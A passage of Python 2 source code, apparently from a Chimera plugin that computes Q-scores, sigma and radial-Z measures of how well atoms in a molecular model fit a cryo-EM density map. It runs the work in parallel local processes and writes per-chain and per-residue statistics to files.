J_ = numpy.dot ( numpy.linalg.inv ( numpy.dot(Jt,J) ), Jt )
except :
#print " - bad matrix?"
#print numpy.dot(Jt,J)
badMatCount += 1
if badMatCount > 3 :
return None, None, None
from numpy import random as R
an = numpy.array ( [R.random()*(y0+yN),R.random()*yN,R.random()*10.0] )
A,B,S = an[0], an[1], an[2]
#print " ? -- A %.3f B %.3f s %.3f" % (A, B, S)
reg = 1.0
continue
ad = numpy.dot ( J_, e )
ann = an - ( ad[:,0] * reg )
A,B,S = ann[0], ann[1], ann[2]
err1 = err3 ( V, S, A, B )
#if err1 > err0 :
# reg = reg * 0.1
# if reg < err :
# break
#else :
an = ann
#print " %d -- A %.3f B %.3f s %.3f - err %.3f, reg %.5f" % (i, A, B, S, err1, reg)
if abs(err0 - err1) < err :
#print " - done"
break
i += 1
return S,A,B
def optSGD ( V, N, err, S=None, A=None, B=None ) :
if S == None :
y0 = V[0][1]
yN = V[-1][1]
S = 0.5
A = y0+yN
B = yN
from numpy import random
lastE = err3 ( V, S, A, B )
#while True :
for i in range(N) :
S_ = S + random.normal ( 0, err ) # mean, sigma
A_ = A + random.normal ( 0, err ) # mean, sigma
B_ = B + random.normal ( 0, err ) # mean, sigma
e = err3 ( V, S_, A_, B_ )
#print "%d %.2f %f %f %.4f" % (i, sdAt, e, numpy.log(e), dd)
if e < lastE :
S, A, B = S_, A_, B_
lastE = e
return S,A,B
def err3 ( XYz, sd, A, B ) :
y0 = XYz[0][1]
err = 0
#for x,y in XYz[1:] :
for x,y in XYz :
yd = y - A * numpy.exp ( -0.5 * numpy.power(x/sd,2) ) - B
err += yd * yd
#err /= float(len(XYz))
return err
def err ( XYz, sd ) :
y0 = XYz[0][1]
err = 0
for x,y in XYz[1:] :
yd = y - y0 * numpy.exp ( -0.5 * numpy.power(x/sd,2) )
err += yd * yd
#err /= float(len(XYz))
return err
def opt0 ( RD_, dStep ) :
sd = 0.1
y0 = RD_[0][1]
minSd, minErr, N = None, 1e99, float ( len(RD_)-1 )
while sd < 10.0 :
err = 0
for x,y in RD_[1:] :
yd = y - y0 * numpy.exp ( -0.5 * numpy.power(x/sd,2) )
err += yd * yd
err /= N
#print err
if err < minErr :
minErr = err
minSd = sd
sd += dStep
def opt ( V, maxErr ) :
dd = 1.0
sdAt = 0.1
lastE = err ( V, sdAt )
#while True :
for i in range(10000) :
sdAt += dd
e = err ( V, sdAt )
#print "%d %.2f %f %f %.4f" % (i, sdAt, e, numpy.log(e), dd)
if e >= lastE :
dd *= -0.75
if abs(dd) < maxErr :
return sdAt
lastE = e
return sdAt
def Calc ( chimeraPath, numProc, res=3.0, bfactorF=-1, sigma=0.6 ) :
print "Calc Q scores"
print " - chimera path: ", chimeraPath
print " - num processors: ", numProc
print " - resolution: ", res
print " - sigma: ", sigma
if bfactorF > 0 :
print " - b-factor: ", bfactorF
from VolumeViewer import Volume
vols = chimera.openModels.list(modelTypes = [Volume])
if len(vols) == 0 :
print " - no volumes loaded"
return
dmap = vols[0]
print " - volume: %s" % dmap.name
from chimera import Molecule
mols = chimera.openModels.list(modelTypes = [Molecule])
if len(mols) == 0 :
print " - no molecules loaded"
return
for mi, mol in enumerate (mols) :
print ""
print "Model %d/%d: %s" % (mi+1, len(mols), mol.name)
SetBBAts ( mol )
ats = [at for at in mol.atoms if not at.element.name == "H"]
points = _multiscale.get_atom_coordinates ( ats, transformed = False )
print " - search tree: %d/%d ats" % ( len(ats), len(mol.atoms) )
allAtTree = AdaptiveTree ( points.tolist(), ats, 1.0)
#allAtTree = None
if numProc == 1 :
CalcQ ( mol, None, dmap, sigma, allAtTree=allAtTree )
else :
CalcQp ( mol, None, dmap, sigma, allAtTree=allAtTree, numProc=numProc )
SaveQStats ( mol, "All", dmap, sigma, res )
if bfactorF > 0 :
minb, maxb = 1.0e9, 0.0
for at in mol.atoms :
at.bfactor = bfactorF * (1.0 - at.Q)
#at.occupancy = 1.0 # max(0,at.Q)
#dval = self.cur_dmap.interpolated_values ( [ at.coord() ], self.cur_mol.openState.xform ).astype(numpy.float64, copy=False)[0]
#at.occupancy = (dval - minD) / (maxD - minD)
minb = min ( minb, at.bfactor )
maxb = max ( maxb, at.bfactor )
molPath = os.path.splitext(mol.openedAs[0])[0]
nname = molPath + "_B%.0f.pdb" % bfactorF
print "Saving pdb with B'-factors, f=%.0f:" % bfactorF
print " -> ", nname
print " - bfactor = %.0f*(1-Qscore), range %.2f to %.2f" % (bfactorF, minb, maxb)
#print " - occupancies set to 1"
print ""
chimera.PDBio().writePDBfile ( [mol], nname )
# this is the function that the MP version executes once Chimera is opened
# with partial model and map
def CalcQForOpenModelsRess () :
from VolumeViewer import Volume
dmap = chimera.openModels.list(modelTypes = [Volume])[0]
print " - dmap: %s" % dmap.name
#minD, maxD = MinMaxD ( dmap )
#print " - mind: %.3f, maxd: %.3f" % (minD, maxD)
#fp = open ( "/Users/greg/_data/_mapsq/scores.txt", "a" )
#fp.write ( "%s...\n" % dmap.name.split("_")[0] )
#fp.close ()
from chimera import Molecule
mol = chimera.openModels.list(modelTypes = [Molecule])[0]
print " - mol: %s" % mol.name
SetBBAts ( mol )
#rids = {}
#for r in mol.residues :
# rids["%d.%s" % (r.id.position,r.id.chainId)] = r
atids = {}
for r in mol.residues :
for at in r.atoms :
r = at.residue
altLoc = '_' if at.altLoc == '' else at.altLoc
atids["%d.%s.%s.%s" % (r.id.position,r.id.chainId,at.name,altLoc)] = at
ats = [at for at in mol.atoms if not at.element.name == "H"]
points = _multiscale.get_atom_coordinates ( ats, transformed = False )
print " - search tree: %d/%d ats" % ( len(ats), len(mol.atoms) )
allAtTree = AdaptiveTree ( points.tolist(), ats, 1.0)
fin = open ( os.path.splitext ( dmap.data.path )[0] + ".txt" )
fout = open ( os.path.splitext ( dmap.data.path )[0] + "_out.txt", "w" )
foutn = os.path.splitext ( dmap.data.path )[0] + "_stat.txt"
sig_at = []
for l in fin :
#print l,
sigma, minD, maxD, atIdStr = l.split()
if not atIdStr in atids :
print " - atid not found: ", atIdStr
at = atids[atIdStr.strip()]
sigma = float(sigma)
minD, maxD = float(minD), float(maxD)
sig_at.append ( [sigma, minD, maxD, at, atIdStr] )
fs = open ( foutn, "w" ); fs.write ( "%d/%d" % (0,len(sig_at) ) ); fs.close()
import time
start = time.time()
i = 0
for sigma, minD, maxD, at, atId in sig_at :
#print "%d.%s.%s" % (r.id.position,r.id.chainId,at.name),
sig = sigma
# Q-scores for ions and water are using sigma of 0.4
#if at.name.upper() in chargedIons or at.residue.type.upper() == "HOH" :
# sig = 0.4
qs = Qscore ( [at], dmap, sig, allAtTree=allAtTree, show=0, log=0, numPts=8, toRAD=2.0, dRAD=0.1, minD=minD, maxD=maxD )
fout.write ( "%s %f\n" % (atId, qs) )
if i%10 == 0 :
end = time.time()
totSec = end - start
leftTime = ""
leftSec = 0.0
iPerSec = float(i) / totSec
if iPerSec > 0 :
leftSec = float ( len(sig_at) - i ) / iPerSec
leftHour = numpy.floor ( leftSec / 60.0 / 60.0 )
leftSec = leftSec - leftHour * 60.0 * 60.0
leftMin = numpy.floor ( leftSec / 60.0 )
leftSec = leftSec - leftMin * 60.0
leftTime = "%.0f:%.0f:%.0f" % (leftHour, leftMin, leftSec)
fs = open ( foutn, "w" ); fs.write ( "%d/%d - %s" % (i+1,len(sig_at),leftTime) ); fs.close()
i += 1
fin.close()
fout.close()
fs = open ( foutn, "w" ); fs.write ( "done" ); fs.close()
def CalcQp ( mol, cid, dmap, sigma, allAtTree=None, useOld=False, log=False, numProc=None ) :
molPath = os.path.splitext(mol.openedAs[0])[0]
mapName = os.path.splitext(dmap.name)[0]
nname = molPath + "__Q__" + mapName + ".pdb"
if useOld :
SetBBAts ( mol )
if QsFromFile ( mol, nname ) :
Qavg = QStats1 ( mol, cid )
return Qavg
#numProc = 2
if numProc == None :
import multiprocessing
numProc = multiprocessing.cpu_count() / 2
M = dmap.data.full_matrix()
minD, maxD = numpy.min(M), numpy.max(M)
print "Q Scores - p - %d" % numProc
print " - map: %s" % dmap.name
print " - mol: %s, chain: %s" % (mol.name, cid if cid != None else "_all_")
print " - sigma: %.2f" % sigma
print " - mind: %.3f, maxd: %.3f" % (minD, maxD)
import time
start = time.time()
SetBBAts ( mol )
ress = []
atoms = []
for r in mol.residues :
if cid == None or cid == "All" or r.id.chainId == cid :
if 1 or r.isNA :
for at in r.atoms :
if 0 or not at.element.name == "H" :
atoms.append ( at )
print " - atoms to do: %d" % len(atoms)
import subprocess
import sys
mapPath = os.path.split ( dmap.data.path )[0]
mapBase = os.path.splitext ( dmap.data.path )[0]
print "cmd:",
#print sys.argv
for arg in sys.argv :
print arg,
print ""
# '/Users/greg/_mol/Chimera.app/Contents/Resources/share/__main__.py'
chiPath = os.path.split ( sys.argv[0] )[0]
#mapQPPath = os.path.join ( chiPath, 'Segger' )
#mapQPPath = os.path.join ( chiPath, 'mapqp.py' )
#print " -- path to mapQ script:", mapQPPath
# for Mac
chiPath, share = os.path.split ( chiPath )
#print chiPath, share
chiPath2, resOrChim = os.path.split ( chiPath )
#print chiPath, resOrChim
if "Chimera" in resOrChim :
print " -- on unix"
chiPath = os.path.join ( chiPath, 'bin' )
chiPath = os.path.join ( chiPath, 'chimera' )
else :
print " -- on mac"
#chiPath2, contents = os.path.split ( chiPath2 )
#print chiPath2, contents
chiPath = os.path.join ( chiPath2, 'MacOS' )
chiPath = os.path.join ( chiPath, 'chimera' )
print " -- path to Chimera:", chiPath
dir_path = os.path.dirname(os.path.realpath(__file__))
inDir = os.path.split(dir_path)[0]
print " -- working dir:", inDir
#mapQPPath = os.path.join ( inDir, 'Segger' )
mapQPPath = os.path.join ( dir_path, 'mapqp.py' )
print " -- path to mapQ script:", mapQPPath
mapBase = mapBase + "_Q-score-mp"
n = len(atoms)
g = [atoms[(n*c)/numProc:(n*(c+1))/numProc] for c in range(numProc)]
procs = []
for mi, atoms1 in enumerate(g) :
ress1 = atoms1[0].residue
ressN = atoms1[-1].residue
print " - %d/%d, %d-%d" % (mi+1, numProc, ress1.id.position, ressN.id.position)
fout = open ( mapBase + "_%d.txt" % mi, "w" )
for at in atoms1 :
r = at.residue
altLoc = '_' if at.altLoc == '' else at.altLoc
fout.write ( "%.3f %f %f %d.%s.%s.%s\n" % (sigma, minD, maxD, r.id.position,r.id.chainId,at.name,altLoc) )
fout.close()
nmap_path = mapBase + "_%d.mrc" % mi
#print " -> ", nmap_path
nmap = MaskMapResize ( atoms1, 4.0, dmap, nmap_path )
#nmap.write_file ( nmap_path , "mrc" )
args = [chiPath, '--nogui', '--silent', '--nostatus', mol.openedAs[0], nmap_path, mapQPPath]
if mi == 0 :
print "running proc:",
for arg in args :
print arg,
print ""
fout = open ( mapBase + "_%d.log" % mi, "w" )
foute = open ( mapBase + "_%d_err.log" % mi, "w" )
p = subprocess.Popen(args, stdout=fout, stderr=foute, cwd=inDir)
procs.append ( [mi, p, fout, foute] )
print ""
print "Waiting...",
for mi, p, fout, foute in procs :
p.wait()
fout.close()
foute.close()
print "%d" % mi,
print ""
atids = {}
for r in mol.residues :
for at in r.atoms :
r = at.residue
altLoc = '_' if at.altLoc == '' else at.altLoc
atids["%d.%s.%s.%s" % (r.id.position,r.id.chainId,at.name,altLoc)] = at
print ""
print "Getting...",
for mi, p, fout, foute in procs :
fin = mapBase + "_%d_out.txt" % mi
#print " - getting from: ", fin
fp = open ( fin )
for l in fp :
#print " - ", l
try :
atId, Q = l.split()
except :
print " - err line: ", l
blah
at = atids[atId.strip()]
#at = r.atomsMap[atName][0]
at.Q = float(Q)
#at.CC = float(cc)
at.bfactor = at.Q
fp.close()
if mi == 0 :
print ""
print ""
print "__Out %d__" % mi
foute = open ( mapBase + "_%d.log" % mi, "r" )
for l in foute :
print l,
print ""
foute.close()
print "__Err %d__" % mi
foute = open ( mapBase + "_%d_err.log" % mi, "r" )
for l in foute :
print l,
print ""
foute.close()
if 1 :
#print " - removing..."
os.remove ( mapBase + "_%d_out.txt" % mi )
try :
os.remove ( mapBase + "_%d_stat.txt" % mi )
except :
print " - did not find _stat file"
pass
os.remove ( mapBase + "_%d.txt" % mi )
os.remove ( mapBase + "_%d.mrc" % mi )
os.remove ( mapBase + "_%d.log" % mi )
os.remove ( mapBase + "_%d_err.log" % mi )
print "%d" % mi,
print ""
end = time.time()
print ""
print " - done, time: %f" % ( end-start )
totSec = end - start
totMin = numpy.floor ( totSec / 60.0 )
totSec = totSec - totMin * 60.0
print " - done, time: %.0f min, %.1f sec" % ( totMin, totSec )
molPath = os.path.splitext(mol.openedAs[0])[0]
mapName = os.path.splitext(dmap.name)[0]
nname = molPath + "__Q__" + mapName + ".pdb"
print "Saving pdb with Q-scores:", nname
chimera.PDBio().writePDBfile ( [mol], nname )
Qavg = QStats1 ( mol, cid )
return Qavg
def QStats1 ( mol, chainId ) :
totQ, totN = 0.0, 0.0
#QT, QN = { "Protein":0.0, "Nucleic":0.0, "Other":0.0 }, { "Protein":0.0, "Nucleic":0.0, "Other":0.0}
QT, QN = {}, {}
QT_, QN_ = {}, {}
QH, QL = {}, {}
doRess = []
for r in mol.residues :
#if r.id.chainId == chainId or chainId == None :
doRess.append ( r )
print ""
print "Q for %d res..." % ( len(doRess) )
for r in doRess :
#if not r.isNA : continue
#if not r.isProt : continue
CalcResQ (r, None, None, useOld=True )
for at in r.atoms :
if at.element.name == "H" :
continue
if hasattr ( at, "Q") :
totQ += at.Q
totN += 1.0
tp = "Other"
if at.residue.isProt : tp = "Protein"
elif at.residue.isNA : tp = "Nucleic"
else : tp = at.residue.type
if tp in QT :
QT[tp] += at.Q;
QN[tp] += 1.0;
QH[tp] = max(QH[tp], at.Q)
QL[tp] = min(QL[tp], at.Q)
else :
QT[tp] = at.Q; QN[tp] = 1.0
QH[tp] = at.Q; QL[tp] = at.Q
tps = r.id.chainId + ":" + tp
if tps in QT_ :
QT_[tps] += at.Q; QN_[tps] += 1.0
else :
QT_[tps] = at.Q; QN_[tps] = 1.0
#for tp in ["Other", "Protein", "Nucleic"] :
print ""
print "Chain\tAvg.Q-score\tEst.Res.(A)"
tpk = QT_.keys()
tpk.sort()
for tp in tpk :
if QN_[tp] > 0 :
avgQ = QT_[tp]/QN_[tp]
avgR = 0
if "nucleic" in tp.lower() :
avgR = (avgQ-1.0673)/-0.1574
else :
avgR = (avgQ-1.1244)/-0.1794
print " %s\t%.3f\t%.2f" % (tp, avgQ, avgR )
else :
print " %s\tn/a" % (tp)
Q__ = { " protein":0, " nucleic":0, " water":0, " ion":0 }
#for tp in ["Other", "Protein", "Nucleic"] :
print ""
print "Type\tAvg.Q-score\tEst.Res.(A)"
for tp in QT.keys() :
if QN[tp] > 0 :
avgQ = QT[tp]/QN[tp]
avgR = 0
if "nucleic" in tp.lower() :
avgR = (avgQ-1.0673)/-0.1574
Q__[" nucleic"] = avgQ
elif "protein" in tp.lower() :
avgR = (avgQ-1.1244)/-0.1794
Q__[" protein"] = avgQ
elif "hoh" in tp.lower() :
avgR = (avgQ-1.1244)/-0.1794
Q__[" water"] = avgQ
elif tp.upper() in chargedIons :
avgR = (avgQ-1.1244)/-0.1794
Q__[" ion"] = avgQ
else :
avgR = (avgQ-1.1244)/-0.1794
Q__[tp] = avgQ
print " %s\t%.3f\t%.2f" % (tp, avgQ, avgR )
else :
print " %s\tn/a" % (tp)
print ""
for tp in QT.keys() :
if QN[tp] > 0 :
print "\t%s" % tp,
print ""
print "Avg.Q.",
for tp in QT.keys() :
if QN[tp] > 0 :
avgQ = QT[tp]/QN[tp]
print "\t%.3f" % avgQ,
print ""
print "Max.Q.",
for tp in QT.keys() :
if QN[tp] > 0 :
print "\t%.3f" % QH[tp],
print ""
print "Min.Q.",
for tp in QT.keys() :
if QN[tp] > 0 :
print "\t%.3f" % QL[tp],
print ""
print ""
return Q__
def SaveQStats ( mol, chainId, dmap, sigma, RES=3.0 ) :
cres = {}
for r in mol.residues :
try :
cres[r.id.chainId].append ( [r.id.position, r] )
except :
cres[r.id.chainId] = [ [r.id.position, r] ]
molPath = os.path.splitext(mol.openedAs[0])[0]
mapName = os.path.splitext(dmap.name)[0]
nname = molPath + "__Q__" + mapName + "_" + chainId + ".txt"
#nname = molPath + "__Q__" + mapName + "_" + cid + ".txt"
fp = open (nname, "w")
print ""
print "Saving per-chain & per-residue Q-scores:"
print " -> res=", RES
print " -> file:", nname
fp.write ( "Chain\tQ_chain\tEst.Res.\tExpectedQ@%.2f\n" % RES )
chains = cres.keys()
chains.sort()
for cid in chains :
if 0 or cid == chainId or chainId == "All" :
tps = {}
resAtoms = []
rs = cres[cid]
for ri, r in rs :
resAtoms.extend ( r.atoms )
tp = "Other"
if r.isProt : tp = "Protein"
elif r.isNA : tp = "Nucleic"
elif r.type.upper() in chargedIons : tp = "Ion"
elif r.type.upper() == "HOH" : tp = "Water"
tps[tp] = 1
ctypes = ""
for tp in tps.keys() :
ctypes = (ctypes + tp) if len(ctypes) == 0 else (ctypes + "," + tp)
cQ = numpy.average ( [at.Q for at in resAtoms if at.element.name != "H"] )
formula, estRes = None, None
if "Protein" in ctypes :
formula = "=-0.1775 * %.2f + 1.1192" % RES
estRes = (cQ - 1.1192) / -0.1775
elif "Nucleic" in ctypes :
formula = "= -0.1377 * %.2f + 0.9973" % RES
estRes = (cQ - 0.9973) / -0.1377
elif "Ion" in ctypes :
formula = "= -0.1103 * %.2f + 1.0795" % RES
estRes = (cQ - 1.0795) / -0.1103
elif "Water" in ctypes :
formula = "= -0.0895 * %.2f + 1.0001" % RES
estRes = (cQ - 1.0001) / -0.0895
fp.write ( "%s\t%.2f\t%.2f\t%s\t(%s)\n" % (cid, cQ, estRes, formula, ctypes) )
#print " - cid: %s - %s - %.2f" % (cid, ctypes, cQ)
fp.write ( "\n" )
fp.write ( "Sigma: %g\n" % sigma )
fp.write ( "\n" )
fp.write ( "Protein: avgQ = -0.1775 * RES + 1.1192\n" )
fp.write ( "Nucleic: avgQ = -0.1377 * RES + 0.9973\n" )
fp.write ( "Ion: avgQ = -0.1103 * RES + 1.0795\n" )
fp.write ( "Water: avgQ = -0.0895 * RES + 1.0001\n" )
fp.write ( "\n" )
avgQrna = -0.1574 * RES + 1.0673 # rna
avgQprot = -0.1794 * RES + 1.1244 # protein
avgQIon = -0.1103 * RES + 1.0795 # ion
avgQWater = -0.0895 * RES + 1.0001 # water
for cid in cres.keys () :
if cid == chainId or chainId == "All" :
fp.write ( "Chain %s\t\t\t\t\t\t\t\tAverage over 1 residue\t\t\t\t\tAverage over 2 residues\t\t\t\t\tAverage over 3 residues\t\t\t\t\tAverage over 5 residues\n\n" % cid )
fp.write ( "Chain\tRes\tRes #\tQ_backBone\tQ_sideChain\tQ_residue\tExpectedQ@%.2f\t\t" % RES )
fp.write ( "Q_backBone(avg-1)\tQ_sideChain(avg-1)\tQ_residue(avg-1)\tExpectedQ@%.2f\t\t" % RES )
fp.write ( "Q_backBone(avg-2)\tQ_sideChain(avg-2)\tQ_residue(avg-2)\tExpectedQ@%.2f\t\t" % RES )
fp.write ( "Q_backBone(avg-3)\tQ_sideChain(avg-3)\tQ_residue(avg-3)\tExpectedQ@%.2f\t\t" % RES )
fp.write ( "Q_backBone(avg-5)\tQ_sideChain(avg-5)\tQ_residue(avg-5)\tExpectedQ@%.2f\t\n" % RES )
#cid = 'A'
rs = cres[cid]
#print " - cid: %s - " % (cid)
rs.sort()
#for i in range (10) :
# print rs[i]
ress = []
Qs, AV, CC = [], [], []
for ri, r in rs :
#if not r.isProt and not r.isNA :
# print " - cid: %s - r %d - not prot or RNA" % (cid, r.id.position)
# continue
ress.append (r)
r.Q = numpy.average ( [at.Q for at in r.atoms if at.element.name != "H"] )
r.qBB, r.qSC = 0, 0
if len(r.bbAtoms) > 0 :
r.qBB = numpy.average ( [at.Q for at in r.bbAtoms if at.element.name != "H"] )
if len(r.scAtoms) > 0 :
r.qSC = numpy.average ( [at.Q for at in r.scAtoms if at.element.name != "H"] )
Qs.append ( [r.qBB, r.qSC, r.Q] )
if 0 :
ad = avgdAts ( r.atoms, dmap )
aSC, aBB = 0, 0
if len(r.scAtoms) > 0 :
aSC = avgdAts ( r.scAtoms, dmap )
if len(r.bbAtoms) > 0 :
aBB = avgdAts ( r.bbAtoms, dmap )
AV.append ( [ad, aBB, aSC] )
if 0 :
cc, ccm = ccAts ( r.atoms, dmap, RES )
ccSC, ccmSC = ccAts ( r.scAtoms, dmap, RES )
ccBB, ccmBB = ccAts ( r.bbAtoms, dmap, RES )
CC.append ( [cc, ccBB, ccSC] )
#CC.append ( [ccm, ccmBB, ccmSugar, ccmBase] )
def N ( A, i, ind, N ) :
#for i, a in enumerate ( A ) :
sum, n = 0, 0
for j in range ( i-N, i+N+1 ) :
if j >= 0 and j < len(A) :
sum += A[j][ind]
n += 1.0
return sum/n
last_i = None
for i, r in enumerate ( ress ) :
# fills in missing residues in proteins and rna
if (r.isNA or r.isProt) and last_i != None :
ii = last_i+1
while ii < r.id.position :
avgQ = avgQrna if r.isNA else avgQprot
fp.write ( "%s\t%s\t%d\t\t\t\t%f\t\t" % (r.id.chainId, "", ii, avgQ ) )
fp.write ( "\t\t\t%f\t\t" % (avgQ) )
fp.write ( "\t\t\t%f\t\t" % (avgQ) )
fp.write ( "\t\t\t%f\t\t" % (avgQ) )
fp.write ( "\t\t\t%f\n" % (avgQ) )
ii += 1
if r.isNA :
fp.write ( "%s\t%s\t%d\t%f\t%f\t%f\t%f\t\t" % (r.id.chainId, r.type, r.id.position, r.qBB, r.qSC, r.Q, avgQrna ) )
fp.write ( "%f\t%f\t%f\t%f\t\t" % (N(Qs,i,0,1), N(Qs,i,1,1), N(Qs,i,2,1), avgQrna ) )
fp.write ( "%f\t%f\t%f\t%f\t\t" % (N(Qs,i,0,2), N(Qs,i,1,2), N(Qs,i,2,2), avgQrna ) )
fp.write ( "%f\t%f\t%f\t%f\t\t" % (N(Qs,i,0,3), N(Qs,i,1,3), N(Qs,i,2,3), avgQrna ) )
fp.write ( "%f\t%f\t%f\t%f\n" % (N(Qs,i,0,5), N(Qs,i,1,5), N(Qs,i,2,5), avgQrna ) )
elif r.isProt :
if len(r.scAtoms) > 0 :
fp.write ( "%s\t%s\t%d\t%f\t%f\t%f\t%f\t\t" % (r.id.chainId, r.type, r.id.position, r.qBB, r.qSC, r.Q, avgQprot ) )
fp.write ( "%f\t%f\t%f\t%f\t\t" % (N(Qs,i,0,1), N(Qs,i,1,1), N(Qs,i,2,1), avgQprot ) )
fp.write ( "%f\t%f\t%f\t%f\t\t" % (N(Qs,i,0,2), N(Qs,i,1,2), N(Qs,i,2,2), avgQprot ) )
fp.write ( "%f\t%f\t%f\t%f\t\t" % (N(Qs,i,0,3), N(Qs,i,1,3), N(Qs,i,2,3), avgQprot ) )
fp.write ( "%f\t%f\t%f\t%f\n" % (N(Qs,i,0,5), N(Qs,i,1,5), N(Qs,i,2,5), avgQprot ) )
else :
fp.write ( "%s\t%s\t%d\t%f\t\t%f\t%f\t\t" % (r.id.chainId, r.type, r.id.position, r.qBB, r.Q, avgQprot ) )
fp.write ( "%f\t\t%f\t%f\t\t" % (N(Qs,i,0,1), N(Qs,i,2,1), avgQprot ) )
fp.write ( "%f\t\t%f\t%f\t\t" % (N(Qs,i,0,2), N(Qs,i,2,2), avgQprot ) )
fp.write ( "%f\t\t%f\t%f\t\t" % (N(Qs,i,0,3), N(Qs,i,2,3), avgQprot ) )
fp.write ( "%f\t\t%f\t%f\n" % (N(Qs,i,0,5), N(Qs,i,2,5), avgQprot ) )
elif r.type.upper() in chargedIons :
fp.write ( "%s\t%s\t%d\t\t\t%f\t%f\t\t" % (r.id.chainId, r.type, r.id.position, r.Q, avgQIon ) )
fp.write ( "\t\t%f\t%f\t\t" % (N(Qs,i,2,1), avgQIon ) )
fp.write ( "\t\t%f\t%f\t\t" % (N(Qs,i,2,2), avgQIon ) )
fp.write ( "\t\t%f\t%f\t\t" % (N(Qs,i,2,3), avgQIon ) )
fp.write ( "\t\t%f\t%f\n" % (N(Qs,i,2,5), avgQIon ) )
elif r.type.upper() == "HOH" :
fp.write ( "%s\t%s\t%d\t\t\t%f\t%f\t\t" % (r.id.chainId, r.type, r.id.position, r.Q, avgQWater ) )
fp.write ( "\t\t%f\t%f\t\t" % (N(Qs,i,2,1), avgQWater ) )
fp.write ( "\t\t%f\t%f\t\t" % (N(Qs,i,2,2), avgQWater ) )
fp.write ( "\t\t%f\t%f\t\t" % (N(Qs,i,2,3), avgQWater ) )
fp.write ( "\t\t%f\t%f\n" % (N(Qs,i,2,5), avgQWater ) )
else :
fp.write ( "%s\t%s\t%d\t\t\t%f\t%f\t\t" % (r.id.chainId, r.type, r.id.position, r.Q, avgQprot ) )
fp.write ( "\t\t%f\t%f\t\t" % (N(Qs,i,2,1), avgQprot ) )
fp.write ( "\t\t%f\t%f\t\t" % (N(Qs,i,2,2), avgQprot ) )
fp.write ( "\t\t%f\t%f\t\t" % (N(Qs,i,2,3), avgQprot ) )
fp.write ( "\t\t%f\t%f\n" % (N(Qs,i,2,5), avgQprot ) )
last_i = r.id.position
fp.write ( "\n\n" )
fp.close()
print ""
def CalcRadZ ( mol, cid, dmap, allAtTree, useOld=False, log=False ) :
print "Rad-Z Scores"
print " - map: %s" % dmap.name
print " - mol: %s, chain: %s" % (mol.name, cid if cid != None else "_all_")
ress = []
for r in mol.residues :
if cid == None or r.id.chainId == cid :
if not useOld :
ress.append ( r )
elif not hasattr (r, 'scS' ) :
ress.append ( r )
print " - residues to do: %d" % len(ress)
for ri, r in enumerate ( ress ) :
r.scZ = RadZ ( r.scAtoms, dmap, allAtTree=allAtTree, show=0, log=0, numPts=10, toRAD=2 )
r.bbZ = RadZ ( r.bbAtoms, dmap, allAtTree=allAtTree, show=0, log=0, numPts=10, toRAD=2 )
if log and ri % 10 == 0 :
status ( "Calculating - res %d/%d" % (ri, len(ress)) )
print ".",
scoresBB, scoresSC = [], []
for r in mol.residues :
if cid == None or r.id.chainId == cid :
if r.bbZ != None :
scoresBB.append ( r.bbZ )
if r.scZ != None :
scoresSC.append ( r.scZ )
print " - avg radz - side chain %.1f, backbone %.1f" % (numpy.average(scoresSC), numpy.average(scoresBB) )
return numpy.average(scoresBB), numpy.average(scoresSC)
def qwork (num, ress, dmap, allAtTree, log):
print 'qwork %d - %d res, %d - %d' % (num, len(ress), ress[0].id.position, ress[-1].id.position)
for ri, r in enumerate ( ress ) :
r.scZ = RadAts ( r.scAtoms, dmap, allAtTree=allAtTree, show=0, log=0, numPts=10, toRAD=2, dRAD=0.2 )
r.bbZ = RadAts ( r.bbAtoms, dmap, allAtTree=allAtTree, show=0, log=0, numPts=10, toRAD=2, dRAD=0.2 )
if num == 0 and log :
status ( "Calculating Q scores - %d/%d" % (ri, len(ress)) )
print ".",
def CalcSigma ( mol, cid, dmap, allAtTree, useOld=False, log=False ) :
print "Sigma Scores"
print " - map: %s" % dmap.name
print " - mol: %s, chain: %s" % (mol.name, cid if cid != None else "_all_")
ress = []
for r in mol.residues :
if cid == None or r.id.chainId == cid :
if not useOld :
ress.append ( r )
elif not hasattr (r, 'scS' ) :
ress.append ( r )
print " - residues to do: %d" % len(ress)
if 0 :
import multiprocessing, threading
N = 4 # multiprocessing.cpu_count()
print " - cores: %d" % N
dn = len(ress) / N
threads = []
for i in range(N):
l = i * dn
h = (i+1)*dn if i != N-1 else len(ress)
#print "t %d, %d-%d" % (i, l, h)
#t = threading.Thread(target=qwork, args=(i,ress[l:h], dmap, allAtTree))
#threads.append(t)
#t.start()
#t = threading.Thread(name='d%d'%i, target=qwork, args=(i,ress[l:h], dmap, allAtTree, log))
#t.setDaemon(True)
#t.start()
#threads.append(t)
#print __name__
if 1 or __name__ == '__main__':
p = ctx.Process(target=qwork, args=(i,ress[l:h], dmap, allAtTree, log))
p.start()
threads.append(p)
for i, t in enumerate(threads) :
print "j %d" % (i)
t.join()
else :
for ri, r in enumerate ( ress ) :
r.bbZ = RadAts ( r.bbAtoms, dmap, allAtTree=allAtTree, show=0, log=0, numPts=10, toRAD=2, dRAD=0.2 )
r.scZ = RadAts ( r.scAtoms, dmap, allAtTree=allAtTree, show=0, log=0, numPts=10, toRAD=2, dRAD=0.2 )
if log and ri % 10 == 0 :
status ( "Calculating - res %d/%d" % (ri, len(ress)) )
print ".",
scoresBB, scoresSC = [], []
ress = []
for r in mol.residues :
if cid == None or r.id.chainId == cid :
ress.append ( r )
if r.bbZ != None : scoresBB.append ( r.bbZ )
if r.scZ != None : scoresSC.append ( r.scZ )
#sc = [x for x in scores if x is not None]
#scSC = [1.0/x for x in scoresSC if x is not None]
#scBB = [1.0/x for x in scoresBB if x is not None]
#print " - %d res, SC min %.2f max %.2f, avg %.2f" % (len(ress), min(scSC), max(scSC), numpy.average(scSC))
print " - avg sigma - side chain %.1f, backbone %.1f" % (numpy.average(scoresSC), numpy.average(scoresBB) )
if 0 :
sByType = {}
rByType = {}
for r in ress :
if r.scZ != None :
if not r.type in sByType :
rByType[r.type] = []
sByType[r.type] = []
rByType[r.type].append ( [r.scZ, r] )
sByType[r.type].append ( [r.scZ] )
avgs = []
for rtype, ra in sByType.iteritems () :
avgs.append ( [numpy.average (ra), rtype] )
from chimera.resCode import protein3to1
from chimera.resCode import nucleic3to1
avgs.sort ( reverse=True, key=lambda x: x[0] )
mapName = os.path.splitext(dmap.name)[0]
molName = os.path.splitext(mol.name)[0]
mdir, mpfile = os.path.split(dmap.data.path)
foname = mdir + "/" + mapName + "__" + molName + ".txt"
print " - scores to: " + foname
fp = open (foname,"w")
for avgScore, rtype in avgs :
rscores = rByType[rtype]
rscores.sort ( reverse=False, key=lambda x: x[0] )
hr = rscores[0]
R = hr[1]
highestScore = hr[0]
